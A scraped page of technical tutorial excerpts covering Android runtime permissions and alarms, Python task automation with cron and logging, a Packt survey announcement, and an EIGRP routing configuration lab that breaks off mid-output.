Toast.LENGTH_SHORT) .show(); } else { Toast.makeText(MainActivity.this, "Denied!", Toast.LENGTH_SHORT) .show(); } return; } } } Now, you're ready to run the application on a device or emulator. How it works... Using the new Runtime Permission model involves the following: Check to see whether you have the desired permissions If not, check whether we should display the rationale (meaning that the request was previously denied) Request the permission; only the OS can display the permission request Handle the request response Here are the corresponding methods: ContextCompat.checkSelfPermission ActivityCompat.requestPermissions ActivityCompat.shouldShowRequestPermissionRationale onRequestPermissionsResult Even though you are requesting permissions at runtime, the desired permission must be listed in the Android Manifest. If the permission is not specified, the OS will automatically deny the request. How to schedule an alarm Android provides AlarmManager to create and schedule alarms. Alarms offer the following features: Schedule alarms for a set time or interval Maintained by the OS, not your application, so alarms are triggered even if your application is not running or the device is asleep Can be used to trigger periodic tasks (such as an hourly news update), even if your application is not running Your app does not use resources (such as timers or background services), since the OS manages the scheduling Alarms are not the best solution if you need a simple delay while your application is running (such as a short delay for a UI event.) For short delays, it's easier and more efficient to use a Handler, as we've done in several previous recipes. When using alarms, keep these best practices in mind: Use as infrequent an alarm timing as possible Avoid waking up the device Use as imprecise timing as possible; the more precise the timing, the more resources required Avoid setting alarm times based on clock time (such as 12:00); add random adjustments if possible to avoid congestion on servers (especially important when checking for new content, such as weather or news) Alarms have three properties, as follows: Alarm type (see in the following list) Trigger time (if the time has already passed, the alarm is triggered immediately) Pending Intent A repeating alarm has the same three properties, plus an Interval: Alarm type (see the following list) Trigger time (if the time has already passed, it triggers immediately) Interval Pending Intent There are four alarm types: RTC (Real Time Clock): This is based on the wall clock time. This does not wake the device. RTC_WAKEUP: This is based on the wall clock time. This wakes the device if it is sleeping. ELAPSED_REALTIME: This is based on the time elapsed since the device boot. This does not wake the device. ELAPSED_REALTIME_WAKEUP: This is based on the time elapsed since the device boot. This wakes the device if it is sleeping. Elapsed Real Time is better for time interval alarms, such as every 30 minutes. Alarms do not persist after device reboots. All alarms are canceled when a device shuts down, so it is your app's responsibility to reset the alarms on device boot. The following recipe will demonstrate how to create alarms with AlarmManager. Getting ready Create a new project in Android Studio and call it Alarms. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. How to do it... Setting an alarm requires a Pending Intent, which Android sends when the alarm is triggered. Therefore, we need to set up a Broadcast Receiving to capture the alarm intent. Our UI will consist of just a simple button to set the alarm. To start, open the Android Manifest and follow these steps: Add the following <receiver> to the <application> element at the same level as the existing <activity> element: Open activity_main.xml and replace the existing TextView with the following button: Create a new Java class called AlarmBroadcastReceiver using the following code: public class AlarmBroadcastReceiver extends BroadcastReceiver { public static final String ACTION_ALARM= "com.packtpub.alarms.ACTION_ALARM"; @Override public void onReceive(Context context, Intent intent) { if (ACTION_ALARM.equals(intent.getAction())) { Toast.makeText(context, ACTION_ALARM, Toast.LENGTH_SHORT).show(); } } } Open ActivityMain.java and add the method for the button click: public void setAlarm(View view) { Intent intentToFire = new Intent(getApplicationContext(), AlarmBroadcastReceiver.class); intentToFire.setAction(AlarmBroadcastReceiver.ACTION_ALARM); PendingIntent alarmIntent = PendingIntent.getBroadcast(getApplicationContext(), 0, intentToFire, 0); AlarmManager alarmManager = (AlarmManager)getSystemService(Context.ALARM_SERVICE); long thirtyMinutes=SystemClock.elapsedRealtime() + 30 * 1000; alarmManager.set(AlarmManager.ELAPSED_REALTIME, thirtyMinutes, alarmIntent); } You're ready to run the application on a device or emulator. How it works... Creating the alarm is done with this line of code: alarmManager.set(AlarmManager.ELAPSED_REALTIME, thirtyMinutes, alarmIntent); Here's the method signature: set(AlarmType, Time, PendingIntent); Prior to Android 4.4 KitKat (API 19), this was the method to request an exact time. Android 4.4 and later will consider this as an inexact time for efficiency, but will not deliver the intent prior to the requested time. (See setExact() as follows if you need an exact time.) To set the alarm, we create a Pending Intent with our previously defined alarm action: public static final String ACTION_ALARM= "com.packtpub.alarms.ACTION_ALARM"; This is an arbitrary string and could be anything we want, but it needs to be unique, so we prepend our package name. We check for this action in the Broadcast Receiver's onReceive() callback. There's more... If you click the Set Alarm button and wait for thirty minutes, you will see the Toast when the alarm triggers. If you are too impatient to wait and click the Set Alarm button again before the first alarm is triggered, you won't get two alarms. Instead, the OS will replace the first alarm with the new alarm, since they both use the same Pending Intent. (If you need multiple alarms, you need to create different Pending Intents, such as using different Actions.) Cancel the alarm If you want to cancel the alarm, call the cancel() method by passing the same Pending Intent you have used to create the alarm. If we continue with our recipe, this is how it would look: alarmManager.cancel(alarmIntent); Repeating alarm If you want to create a repeating alarm, use the setRepeating() method. The Signature is similar to the set() method, but with an interval. This is shown as follows: setRepeating(AlarmType, Time (in milliseconds), Interval, PendingIntent); For the Interval, you can specify the interval time in milliseconds or use one of the predefined AlarmManager constants: INTERVAL_DAY INTERVAL_FIFTEEN_MINUTES INTERVAL_HALF_DAY INTERVAL_HALF_HOUR INTERVAL_HOUR Receiving notification of device boot Android sends out many intents during its lifetime. One of the first intents sent is ACTION_BOOT_COMPLETED. If your application needs to know when the device boots, you need to capture this intent. This recipe will walk you through the steps required to be notified when the device boots. Getting ready Create a new project in Android Studio and call it DeviceBoot. Use the default Phone & Tablet option and select Empty Activity when prompted for Activity Type. How to do it... To start, open the Android Manifest and follow these steps: Add the following permission: Add the following <receiver> to the <application> element, at the same level as the existing <activity> element: Create a new Java class called BootBroadcastReceiver using the following code: public class BootBroadcastReceiver extends BroadcastReceiver { @Override public void onReceive(Context context, Intent intent) { if (intent.getAction().equals( "android.intent.action.BOOT_COMPLETED")) { Toast.makeText(context, "BOOT_COMPLETED", Toast.LENGTH_SHORT).show(); } } } Reboot the device to see the Toast. How it works... When the device boots, Android will send the BOOT_COMPLETED intent. As long as our application has the permission to receive the intent, we will receive notifications in our Broadcast Receiver. There are three aspects to make this work: Permission for RECEIVE_BOOT_COMPLETED Adding both BOOT_COMPLETED and DEFAULT to the receiver intent filter Checking for the BOOT_COMPLETED action in the Broadcast Receiver Obviously, you'll want to replace the Toast message with your own code, such as for recreating any alarms you might need. Thus, in this article, we looked at different factors that need to be checked off before your app gets ready for the play store.  We discussed three topics: Android 6.0 Runtime permission model, scheduling an alarm and detecting a device reboot.  If you found this post useful, be sure to check out the book 'Android 9 Development Cookbook - Third Edition', to learn about using AsyncTask for background work recipe, adding speech recognition to your app,  and adding Google sign-in to your app. Building an Android App using the Google Faces API [ Tutorial] How Android app developers can convert iPhone apps 6 common challenges faced by Android App developers
Read more
  • 0
  • 0
  • 12372

article-image-preparing-and-automating-a-task-in-python-tutorial
Bhagyashree R
10 Jan 2019
15 min read
Save for later

Preparing and automating a task in Python [Tutorial]

Bhagyashree R
10 Jan 2019
15 min read
To properly automate tasks, we need a platform so that they run automatically at the proper times. A task that needs to be run manually is not really fully automated. But, in order to be able to leave them running in the background while worrying about more pressing issues, the task will need to be adequate to run in fire-and-forget mode. We should be able to monitor that it runs correctly, be sure that we are capturing future actions (such as receiving notifications if something interesting arises), and know whether there have been any errors while running it. Ensuring that a piece of software runs consistently with high reliability is actually a very big deal and is one area that, to be done properly, requires specialized knowledge and staff, which typically go by the names of sysadmin, operations, or SRE (Site Reliability Engineering). In this article, we will learn how to prepare and automatically run tasks. It covers how to program tasks to be executed when they should, instead of running them manually, and how to be notified if there has been an error in an automated process. This article is an excerpt from a book written by Jaime Buelta titled Python Automation Cookbook.  The Python Automation Cookbook helps you develop a clear understanding of how to automate your business processes using Python, including detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. To follow along with the examples implemented in the article, you can find the code on the book's GitHub repository. Preparing a task It all starts with defining exactly what task needs to be run and designing it in a way that doesn't require human intervention to run. Some ideal characteristic points are as follows: Single, clear entry point: No confusion on what the task to run is. Clear parameters: If there are any parameters, they should be very explicit. No interactivity: Stopping the execution to request information from the user is not possible. The result should be stored: To be able to be checked at a different time than when it runs. Clear result: If we are working interactively in a result, we accept more verbose results or progress reports. But, for an automated task, the final result should be as concise and to the point as possible. Errors should be logged: To analyze what went wrong. A command-line program has a lot of those characteristics already. It has a clear way of running, with defined parameters, and the result can be stored, even if just in text format. But, it can be improved with a config file to clarify the parameters and an output file. Getting ready We'll start by following a structure in which the main function will serve as the entry point, and all parameters are supplied to it. The definition of the main function with all the explicit arguments covers points 1 and 2. Point 3 is not difficult to achieve. To improve point 2 and 5, we'll look at retrieving the configuration from a file and storing the result in another. How to do it... Prepare the following task and save it as prepare_task_step1.py: import argparse def main(number, other_number): result = number * other_number print(f'The result is {result}') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) args = parser.parse_args() main(args.n1, args.n2) Update the file to define a config file that contains both arguments, and save it as prepare_task_step2.py: import argparse import configparser def main(number, other_number): result = number * other_number print(f'The result is {result}') if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file') args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2) Create the config file config.ini: [ARGUMENTS] n1=5 n2=7 Run the command with the config file: $ python3 prepare_task_step2.py -c config.ini The result is 35 $ python3 prepare_task_step2.py -c config.ini -n1 2 -n2 3 The result is 35 Add a parameter to store the result in a file, and save it as prepare_task_step5.py: import argparse import sys import configparser def main(number, other_number, output): result = number * other_number print(f'The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file') parser.add_argument('-o', dest='output', type=argparse.FileType('w'), help='output file', default=sys.stdout) args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2, args.output) Run the result to check that it's sending the output to the defined file: $ python3 prepare_task_step5.py -n1 3 -n2 5 -o result.txt $ cat result.txt The result is 15 $ python3 prepare_task_step5.py -c config.ini -o result2.txt $ cat result2.txt The result is 35 How it works... Note that the argparse module allows us to define files as parameters, with the argparse.FileType type, and opens them automatically. This is very handy and will raise an error if the file is not valid. The configparser module allows us to use config files with ease. As demonstrated in Step 2, the parsing of the file is as simple as follows: config = configparser.ConfigParser() config.read_file(file) The config will then be accessible as a dictionary divided by sections, and then values. Note that the values are always stored in string format, requiring to be transformed into other types, such as integers. Python 3 allows us to pass a file parameter to the print function, which will write to that file. Step 5 shows the usage to redirect all the printed information to a file. Note that the default parameter is sys.stdout, which will print the value to the Terminal (standard output). This makes it so that calling the script without an -o parameter will display the information on the screen, which is helpful in debugging: $ python3 prepare_task_step5.py -c config.ini The result is 35 $ python3 prepare_task_step5.py -c config.ini -o result.txt $ cat result.txt The result is 35 Setting up a cron job Cron is an old-fashioned but reliable way of executing commands. It has been around since the 70s in Unix, and it's an old favorite in system administration to perform maintenance, such as freeing space, rotating logs, making backups, and other common operations. Getting ready We will produce a script, called  cron.py: import argparse import sys from datetime import datetime import configparser def main(number, other_number, output): result = number * other_number print(f'[{datetime.utcnow().isoformat()}] The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--config', '-c', type=argparse.FileType('r'), help='config file', default='/etc/automate.ini') parser.add_argument('-o', dest='output', type=argparse.FileType('a'), help='output file', default=sys.stdout) args = parser.parse_args() if args.config: config = configparser.ConfigParser() config.read_file(args.config) # Transforming values into integers args.n1 = int(config['DEFAULT']['n1']) args.n2 = int(config['DEFAULT']['n2']) main(args.n1, args.n2, args.output) Note the following details: The config file is by default, /etc/automate.ini. Reuse config.ini from the previous recipe. A timestamp has been added to the output. This will make it explicit when the task is run. The result is being added to the file, as shown with the 'a' mode where the file is open. The ArgumentDefaultsHelpFormatter parameter automatically adds information about default values when printing the help using the -h argument. Check that the task is producing the expected result and that you can log to a known file: $ python3 cron.py [2018-05-15 22:22:31.436912] The result is 35 $ python3 cron.py -o /path/automate.log $ cat /path/automate.log [2018-05-15 22:28:08.833272] The result is 35 How to do it... Obtain the full path of the Python interpreter. This is the interpreter that's on your virtual environment: $ which python /your/path/.venv/bin/python Prepare the cron to be executed. Get the full path and check that it can be executed with no problem. Execute it a couple of times: $ /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log $ /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Check that the result is being added correctly to the result file: $ cat /path/automate.log [2018-05-15 22:28:08.833272] The result is 35 [2018-05-15 22:28:10.510743] The result is 35 Edit the crontab file to run the task once every five minutes: $ crontab -e */5 * * * * /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Note that this opens an editing Terminal with your default command-line editor. Check the crontab contents. Note that this displays the crontab contents, but doesn't set it to edit: $ contab -l */5 * * * * /your/path/.venv/bin/python /your/path/cron.py -o /path/automate.log Wait and check the result file to see how the task is being executed: $ tail -F /path/automate.log [2018-05-17 21:20:00.611540] The result is 35 [2018-05-17 21:25:01.174835] The result is 35 [2018-05-17 21:30:00.886452] The result is 35 How it works... The crontab line consists of a line describing how often to run the task (first six elements), plus the task. Each of the initial six elements mean a different unit of time to execute. Most of them are stars, meaning any: * * * * * * | | | | | | | | | | | +-- Year (range: 1900-3000) | | | | +---- Day of the Week (range: 1-7, 1 standing for Monday) | | | +------ Month of the Year (range: 1-12) | | +-------- Day of the Month (range: 1-31) | +---------- Hour (range: 0-23) +------------ Minute (range: 0-59) Therefore, our line, */5 * * * * *, means every time the minute is divisible by 5, in all hours, all days... all years. Here are some examples: 30 15 * * * * means "every day at 15:30" 30 * * * * * means "every hour, at 30 minutes" 0,30 * * * * * means "every hour, at 0 minutes and 30 minutes" */30 * * * * * means "every half hour" 0 0 * * 1 * means "every Monday at 00:00" Do not try to guess too much. Use a cheat sheet like crontab guru for examples and tweaks. Most of the common usages will be described there directly. You can also edit a formula and get a descriptive text on how it's going to run. After the description of how to run the cron job, including the line to execute the task, as prepared in Step 2 in the How to do it… section. Capturing errors and problems An automated task's main characteristic is its fire-and-forget quality. We are not actively looking at the result, but making it run in the background. This recipe will present an automated task that will safely store unexpected behaviors in a log file that can be checked afterward. Getting ready As a starting point, we'll use a task that will divide two numbers, as described in the command line. How to do it... Create the task_with_error_handling_step1.py file, as follows: import argparse import sys def main(number, other_number, output): result = number / other_number print(f'The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('-o', dest='output', type=argparse.FileType('w'), help='output file', default=sys.stdout) args = parser.parse_args() main(args.n1, args.n2, args.output) Execute it a couple of times to see that it divides two numbers: $ python3 task_with_error_handling_step1.py -n1 3 -n2 2 The result is 1.5 $ python3 task_with_error_handling_step1.py -n1 25 -n2 5 The result is 5.0 Check that dividing by 0 produces an error and that the error is not logged on the result file: $ python task_with_error_handling_step1.py -n1 5 -n2 1 -o result.txt $ cat result.txt The result is 5.0 $ python task_with_error_handling_step1.py -n1 5 -n2 0 -o result.txt Traceback (most recent call last): File "task_with_error_handling_step1.py", line 20, in <module> main(args.n1, args.n2, args.output) File "task_with_error_handling_step1.py", line 6, in main result = number / other_number ZeroDivisionError: division by zero $ cat result.txt Create the task_with_error_handling_step4.py file: import logging import sys import logging LOG_FORMAT = '%(asctime)s %(name)s %(levelname)s %(message)s' LOG_LEVEL = logging.DEBUG def main(number, other_number, output): logging.info(f'Dividing {number} between {other_number}') result = number / other_number print(f'The result is {result}', file=output) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-n1', type=int, help='A number', default=1) parser.add_argument('-n2', type=int, help='Another number', default=1) parser.add_argument('-o', dest='output', type=argparse.FileType('w'), help='output file', default=sys.stdout) parser.add_argument('-l', dest='log', type=str, help='log file', default=None) args = parser.parse_args() if args.log: logging.basicConfig(format=LOG_FORMAT, filename=args.log, level=LOG_LEVEL) else: logging.basicConfig(format=LOG_FORMAT, level=LOG_LEVEL) try: main(args.n1, args.n2, args.output) except Exception as exc: logging.exception("Error running task") exit(1) Run it to check that it displays the proper INFO and ERROR log and that it stores it on the log file: $ python3 task_with_error_handling_step4.py -n1 5 -n2 0 2018-05-19 14:25:28,849 root INFO Dividing 5 between 0 2018-05-19 14:25:28,849 root ERROR division by zero Traceback (most recent call last): File "task_with_error_handling_step4.py", line 31, in <module> main(args.n1, args.n2, args.output) File "task_with_error_handling_step4.py", line 10, in main result = number / other_number ZeroDivisionError: division by zero $ python3 task_with_error_handling_step4.py -n1 5 -n2 0 -l error.log $ python3 task_with_error_handling_step4.py -n1 5 -n2 0 -l error.log $ cat error.log 2018-05-19 14:26:15,376 root INFO Dividing 5 between 0 2018-05-19 14:26:15,376 root ERROR division by zero Traceback (most recent call last): File "task_with_error_handling_step4.py", line 33, in <module> main(args.n1, args.n2, args.output) File "task_with_error_handling_step4.py", line 11, in main result = number / other_number ZeroDivisionError: division by zero 2018-05-19 14:26:19,960 root INFO Dividing 5 between 0 2018-05-19 14:26:19,961 root ERROR division by zero Traceback (most recent call last): File "task_with_error_handling_step4.py", line 33, in <module> main(args.n1, args.n2, args.output) File "task_with_error_handling_step4.py", line 11, in main result = number / other_number ZeroDivisionError: division by zero How it works... To properly capture any unexpected exceptions, the main function should be wrapped into a try-except block, as done in Step 4 in the How to do it… section. Compare this to how Step 1 is not wrapping the code: try: main(...) except Exception as exc: # Something went wrong logging.exception("Error running task") exit(1) The extra step to exit with status 1 with the exit(1) call informs the operating system that something went wrong with our script. The logging module allows us to log. Note the basic configuration, which includes an optional file to store the logs, the format, and the level of the logs to display. Creating logs is easy. You can do this by making a call to the method logging.<logging level>, (where logging level is debug, info, and so on). logging.exception() is a special case that will create an ERROR log, but it will also include information about the exception, such as the stack trace. Remember to check logs to discover errors. A useful reminder is to add a note on the results file, like this: try: main(args.n1, args.n2, args.output) except Exception as exc: logging.exception(exc) print('There has been an error. Check the logs', file=args.output) In this article, we saw how to define and design a task so that no human intervention is needed to run it. We learned how to use cron for automating a task. We further presented an automated task that will safely store unexpected behaviors in a log file that can be checked afterward. If you found this post useful, do check out the book, Python Automation Cookbook to develop a clear understanding of how to automate your business processes using Python. This includes detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. Write your first Gradle build script to start automating your project [Tutorial] Ansible 2 for automating networking tasks on Google Cloud Platform [Tutorial] Automating OpenStack Networking and Security with Ansible 2 [Tutorial]
Read more
  • 0
  • 0
  • 16505

article-image-pay-it-forward-this-new-year-rewriting-the-code-on-career-development
Packt Editorial Staff
09 Jan 2019
3 min read
Save for later

Pay it Forward this New Year – Rewriting the code on career development

Packt Editorial Staff
09 Jan 2019
3 min read
This Festive and New Year period, Packt Publishing Ltd are commissioning their newest group of authors – you, the everyday expert – in order to help the next generation of developers, coders, and architects. Packt, a global leader in publishing technology and coding eBooks and videos,  are asking the technology community to ‘pay it forward’ by looking back at their career and paying their advice forward to support the next generation of technology leaders via a survey.  The aim is to rewrite the code on career development and find out what everyday life looks like for those in our community. The Pay it Forward eBook that will be created, will provide tips and insights from the tech profession. Rather than giving off the shelf advice on how to better your career, Packt are asking everyday experts – the professionals across the globe who make the industry tick – for the insights and advice they would give from the good and the bad that they have seen. The most insightful and useful responses to the survey will be published by Packt in a new eBook, which will be available for free in early 2019. Some of the questions Pay it Forward will seek answers to, include: What is the biggest myth about working in tech? If you could give one career hack, what would it be? How do you keep on top of new developments and news? What are the common challenges you have seen or experienced in your profession? Who do you most admire and why? What is the best piece of advice you have received that has helped you in your career? What advice would you give to a student wishing to enter your profession? Have you actually broken the internet? We all make mistakes, how do you handle them? What do you love about what you do? People can offer their responses here: http://payitforward.packtpub.com/ Commenting on Pay it Forward, Packt Publishing Ltd CEO and founder Dave Maclean, said, “Over time we all gain knowledge through our experiences. We’ve all failed and learned and found better ways to do things.  As we come into the New Year, we’re reflecting on what we have learned and we’re calling on our community of everyday experts to share their knowledge with people who are new to the industry, to the next generation of changemakers.” “For our part, Packt will produce a book that pulls together this advice and make it available for free to help those wishing to pursue a career within technology.” The survey should take no more than 10 minutes to complete and is in complete confidence, with no disclosure of names or details, unless agreed.
Read more
  • 0
  • 0
  • 2820
article-image-implementing-the-eigrp-routing-protocol-tutorial
Amrata Joshi
09 Jan 2019
13 min read
Save for later

Implementing the EIGRP Routing Protocol [Tutorial]

Amrata Joshi
09 Jan 2019
13 min read
EIGRP originated from Interior Gateway Routing Protocol (IGRP). The problem with IGRP is that it had no support for Variable Length Subnet Masking (VLSM) and it was broadcast-based. With the Enhance Interior Gateway Routing Protocol, we now have support for VLSM and the updates are sent via a multicast using the following multicast address: 224.0.0.100 for IPv4. This article is an excerpt taken from the book  CCNA Routing and Switching 200-125 Certification Guide by Lazaro (Laz) Diaz. This book covers the understanding of networking using routers and switches, layer 2 technology and its various configurations and connections, VLANS and inter-VLAN routing and more. You can learn how to configure default, static, and dynamic routing, how to design and implement subnetted IPv4 and IPv6 addressing schemes and more. This article focuses on how EIGRP works, its features, and configuring EIGRP for single autonomous systems and multiple autonomous systems. EIGRP has a lot more to offer than its predecessor. Not only is it a classless routing protocol with VLSM capabilities, it has a maximum hop count of 255, but by default this is set to 100. It is also considered a hybrid or advanced distance-vector routing protocol. That means that it has the better of two worlds, with a links state and distance vector (DV). The DV features are just like RIPv2, where it has limited hop counts. It will send out the complete routing table to its neighboring routers the first time it tries to converge, and it will summarize the route. So, you would have to use the no auto-summary command so that it sends out the subnet mask along with the updates. It has link state features, such as triggered updates, after it has fully converged, and the routing table is complete. EIGRP will maintain neighbor relationships or adjacencies, using hello messages and when a network is added or removed, it will only send that change. EIGRP also has a very intelligent algorithm. The Dual algorithm will consider several attributes to make a more efficient or reliable decision as to which path it will send out the packet on to reach the destination faster. Also, EIGRP is based on autonomous systems, with a range from 1-65,535. You can only have one autonomous system, which means all the routers are sharing the same routing table, or you can have multiple autonomous systems, at that point you would have to redistribute the routes into the other AS, for the routers to communicate with each other. So, EIGRP is a very powerful routing protocol and it has a lot of benefits to allow us to run our network more efficiently. So, let's create a list of the major features: Support for VLSM or CIDR Summarization and discontinuous networks Best path selection using the DUAL No broadcast; we use multicast now Supports IPv4 and IPv6 Efficient neighbor discovery Diffusing Update Algorithm or DUAL This is the algorithm that allows EIGRP to have all the features it has and allows traffic to be so reliable. The following is a list of the essential tasks that it does: Finds a backup route if the topology permits Support for VLSM Dynamic route recovery Query its neighbor routers for other alternate routes EIGRP routers maintain a copy of all their neighbors' routes, so they can calculate their own cost to each destination network. That way, if the successor route goes down, they can query the topology table for alternate or backup routes. This is what makes EIGRP so awesome since it keeps all the routes from their neighbors and, if a route goes down, it can query the topology table for an alternate route. But, what if the query to the topology table does not work? Well, EIGRP will then ask its neighbors for help to find an alternate path! The DUAL strategy and the reliability and leveraging of other routers make it the quickest to converge on a network. For the DUAL to work, it must meet the following three requirements: Neighbors are discovered or noted as dead within a distinct time Messages that transmitted should be received correctly Messages and changes received must be dealt with in the order they were received The following command will show you those hello messages received, and more: R1#sh ip eigrp traffic IP-EIGRP Traffic Statistics for process 100 Hellos sent/received: 56845/37880 Updates sent/received: 9/14 Queries sent/received: 0/0 Replies sent/received: 0/0 Acks sent/received: 14/9 Input queue high water mark 1, 0 drops SIA-Queries sent/received: 0/0 SIA-Replies sent/received: 0/0 If you wanted to change the default hello timer to something greater, the command would be the following: Remember that this command is typed under interface configuration mode. Configuring EIGRP EIGRP also works with tables. The routing table, topology table, and neighbor table, all work together to make sure if a path to a destination network fails then the routing protocol will always have an alternate path to that network. The alternate path is chosen by the FD or feasible distance. If you have the lowest FD, then you are the successor route and will be placed in the routing table. If you have a higher FD, you will remain in the topology table as a feasible successor. So, EIGRP is a very reliable protocol. Let's configure it. The following topology is going to be a full mesh, with LANs on each router. This will add to the complexity of the lab, so we can look at everything we have talked about. Before we begin configurations, we must know the IP addressing scheme of each device. The following table shows the addresses, gateways, and masks of each device: The routing protocol in use must learn to use our show commands: R1#sh ip protocols Routing Protocol is "eigrp 100 " Outgoing update filter list for all interfaces is not set Incoming update filter list for all interfaces is not set Default networks flagged in outgoing updates Default networks accepted from incoming updates EIGRP metric weight K1=1, K2=0, K3=1, K4=0, K5=0 EIGRP maximum hopcount 100 EIGRP maximum metric variance 1 Redistributing: eigrp 100 Automatic network summarization is not in effect Maximum path: 4 Routing for Networks: 192.168.1.0 10.0.0.0 Routing Information Sources: Gateway Distance Last Update 10.1.1.10 90 1739292 10.1.1.22 90 1755881 10.1.1.6 90 1774985 Distance: internal 90 external 170 Okay, you have the topology, the IP scheme, and which routing protocol to use, and its autonomous system. As you can see, I already configured the lab, but now it's your turn. You are going to have to configure it to follow along with the show command we are about to do. You should, by now, know your admin commands. The first thing you need to worry about is connectivity, so I will show you the output of the sh ip int brief command from each router: As you can see, all my interfaces have the correct IPv4 addresses and they are all up; your configuration should be the same. If you also want to see the subnet mask of the command you could have done, which is like sh ip int brief, it is sh protocols: After you have checked that all your interfaces are up and running, it is now time to configure the routing protocol. We will be doing a single autonomous system using the number 100 on all the routers, so they can share the same routing table. Through the uses of hello messages, they can discover their neighbors. The configuration of the EIGRP protocol should look like this per router: As you can see, we are using the 100 autonomous system number for all routers and when we advertise the networks, especially the 10.1.1.0 network, we use the classfull boundary, which is a Class A network. We must not forget the no auto-summary command or it will not send out the subnet mask on the updates. Now, let's check out our routing tables to see if we have converged fully, meaning we have found all our networks: R2 R2#SH IP ROUTE Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets D 10.1.1.4 [90/2172416] via 10.1.1.26, 02:27:38, FastEthernet0/1 C 10.1.1.8 is directly connected, Serial0/0/0 D 10.1.1.12 [90/2172416] via 10.1.1.26, 02:27:38, FastEthernet0/1 C 10.1.1.16 is directly connected, Serial0/0/1 D 10.1.1.20 [90/2172416] via 10.1.1.9, 02:27:39, Serial0/0/0 [90/2172416] via 10.1.1.18, 02:27:39, Serial0/0/1 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.9, 02:27:39, Serial0/0/0 C 192.168.2.0/24 is directly connected, FastEthernet0/0 D 192.168.3.0/24 [90/2172416] via 10.1.1.18, 02:27:39, Serial0/0/1 D 192.168.4.0/24 [90/30720] via 10.1.1.26, 02:27:38, FastEthernet0/1 R3 R3Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets D 10.1.1.4 [90/2172416] via 10.1.1.21, 02:28:49, FastEthernet0/1 D 10.1.1.8 [90/2172416] via 10.1.1.21, 02:28:49, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/1 C 10.1.1.16 is directly connected, Serial0/0/0 C 10.1.1.20 is directly connected, FastEthernet0/1 D 10.1.1.24 [90/2172416] via 10.1.1.17, 02:28:50, Serial0/0/0 [90/2172416] via 10.1.1.14, 02:28:50, Serial0/0/1 D 192.168.1.0/24 [90/30720] via 10.1.1.21, 02:28:49, FastEthernet0/1 D 192.168.2.0/24 [90/2172416] via 10.1.1.17, 02:28:50, Serial0/0/0 C 192.168.3.0/24 is directly connected, FastEthernet0/0 D 192.168.4.0/24 [90/2172416] via 10.1.1.14, 02:28:50, Serial0/0/1 R4 R4#SH IP ROUTE Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets C 10.1.1.4 is directly connected, Serial0/0/1 D 10.1.1.8 [90/2172416] via 10.1.1.25, 02:29:51, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 02:29:51, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.5, 02:29:52, Serial0/0/1 [90/2172416] via 10.1.1.13, 02:29:52, Serial0/0/0 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.5, 02:29:52, Serial0/0/1 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 02:29:51, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 02:29:52, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 It seems that EIGRP has found all our different networks and has applied the best metric to each destination. If you look closely at the routing table, you will see that two networks have multiple paths to it: 10.1.1.20 and 10.1.1.24. The path that it takes is determined by the router that is learning it. So, what does that mean? EIGRP has two successor routes or two feasible distances that are equal, so they must go to the routing table. All other routes to include the successor routes will be in the topology table. I have highlighted the networks that have the multiple paths, which means they can go in either direction, but EIGRP will load balance by default when it has multiple paths: We need to see exactly which path it is taking to this network: 10.1.1.20. This is from the R4 viewpoint. It could go via 10.1.1.5 or 10.1.1.13, so let's use the tools we have at hand, such as traceroute: R4#traceroute 10.1.1.20 Type escape sequence to abort. Tracing the route to 10.1.1.20 1 10.1.1.5 7msec 1 msec 6 msec So, even if they have the identical metric of 2172416, it will choose the first path from top to bottom, to send the packet to the destination. If that path is shut down or is disconnected, it will still have an alternate route to get to the destination. In your lab, if you followed the configuration exactly as I did it, you should get the same results. But, this is where your curiosity should come in. Shut down the 10.1.1.5 interface and see what happens. What will your routing table look like then? Will it have only one route to the destination or will it have more than one? Remember that when a successor route goes down, EIGRP will query the topology table to find an alternate route, but in this situation, will it do that, since an alternate route exists? Let's take a look: R1(config)#int s0/0/0 R1(config-if)#shut Now let's take a look at the routing table from the R4 perspective. The first thing that happens is the following: R4# %LINK-5-CHANGED: Interface Serial0/0/1, changed state to down %LINEPROTO-5-UPDOWN: Line protocol on 